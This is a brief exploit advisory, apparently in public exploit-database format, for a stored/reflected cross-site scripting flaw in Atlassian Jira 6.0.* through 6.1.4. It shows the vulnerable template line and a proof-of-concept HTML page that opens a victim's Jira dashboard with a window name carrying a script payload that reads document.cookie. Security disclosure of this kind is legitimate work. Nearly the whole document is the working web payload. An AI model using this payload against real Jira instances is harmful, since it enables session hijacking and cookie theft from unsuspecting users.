# Exploit Title: Atlassian Jira 6.0.* <= 6.1.4
# Date: 27.01.2016
# Author: Razvan Cernaianu
# Vendor Homepage: https://www.atlassian.com
# Version: 6.0.* <= 6.1.4
# Website: www.CyberSmartDefence.com
# Blog: www.TinKode.com

---[ *Vulnerable Code* ]---



*# Vulnerable Parameter: $window.name <http://window.name><div
class="aui-page-header-main">  <h1>${name}</h1></div>*


---[ *Proof of Concept* ]---





*<html><script>  var victim=
window.open('https://victim/secure/Dashboard.jspa
<https://victim/secure/Dashboard.jspa>',
'<script>alert(document.cookie);<\/script>');</script></html>  *